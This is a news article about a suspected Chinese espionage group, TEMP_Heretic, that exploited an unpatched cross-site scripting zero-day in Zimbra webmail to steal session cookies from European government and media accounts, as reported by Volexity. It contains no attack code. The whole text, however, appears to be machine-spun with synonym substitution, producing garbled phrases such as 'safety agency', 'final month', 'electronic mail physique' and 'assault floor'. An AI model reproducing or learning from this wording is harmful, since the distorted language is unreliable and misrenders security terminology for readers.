European governments targeted by Chinese hackers with a Zimbra webmail zero-day

A brand new Chinese cyber-espionage group has been seen abusing a zero-day vulnerability within the Zimbra collaboration suite to achieve entry to the e-mail inboxes of European governments and media businesses.

The assaults have been noticed final month by safety agency Volexity, and even when the safety agency notified Zimbra on December 16, the corporate has not but launched a patch for its product.

Earlier at present, Volexity has launched a technical report in regards to the assaults within the hopes to boost consciousness of this situation and permit organizations that use a Zimbra electronic mail server to assessment if they’ve been targeted.

Hackers stole cookies to entry targeted accounts

According to Volexity, the attackers first started exploiting this zero-day on December 14, when its researchers noticed the preliminary assaults on a few of its clients.

Volexity mentioned the assaults have been break up into two levels. In the primary, the hackers despatched a benign electronic mail meant to carry out reconnaissance and decide if accounts have been lively and if customers can be keen to open unusual emails from unknown entities.

The precise assault occurred in a second electronic mail when the hackers would come with a hyperlink within the electronic mail physique. If customers accessed the URL, they’d land on a distant web site the place malicious JavaScript code would execute a cross-site scripting (XSS) assault in opposition to their group’s Zimbra webmail software.

The Volexity crew mentioned this code exploited a difficulty in Zimbra webmail purchasers working variations 8.8.15 P29 & P30 and would enable the attackers to steal the Zimbra session cookie recordsdata.

These recordsdata would then enable the attackers to connect with a Zimbra account, from the place they’d achieve entry to emails, ship extra phishing messages to a consumer’s contacts, and even immediate customers to obtain malware.

While there are presently greater than 33,000 Zimbra servers related to the web, Volexity mentioned that the zero-day doesn’t work in opposition to Zimbra 9.x installs, that are the newest model of the platform, which means that the assault floor is just not as massive as initially thought.

Volexity hyperlinks hackers to China

The safety agency mentioned that based mostly on the attacker’s infrastructure utilized in these assaults, they haven’t been capable of hyperlink this risk actor, which they’ve named TEMP_Heretic, to a beforehand identified group or exercise cluster.

Nonetheless, based mostly on the methods used within the assaults, Volexity mentioned they imagine “the attacker is probably going Chinese in origin.”

The safety agency mentioned that based mostly on its visibility, it has seen TEMP_Heretic attacking European governments and media businesses; nevertheless, the group is believed to have attacked many extra different targets.

IT directors who run Zimbra electronic mail servers and want to know if they’ve been targeted are suggested to test the Volexity report. The safety agency mentioned TEMP_Heretic normally used emails posing as invites, refunds, warnings, and emails with no topic strains as lures for his or her assaults.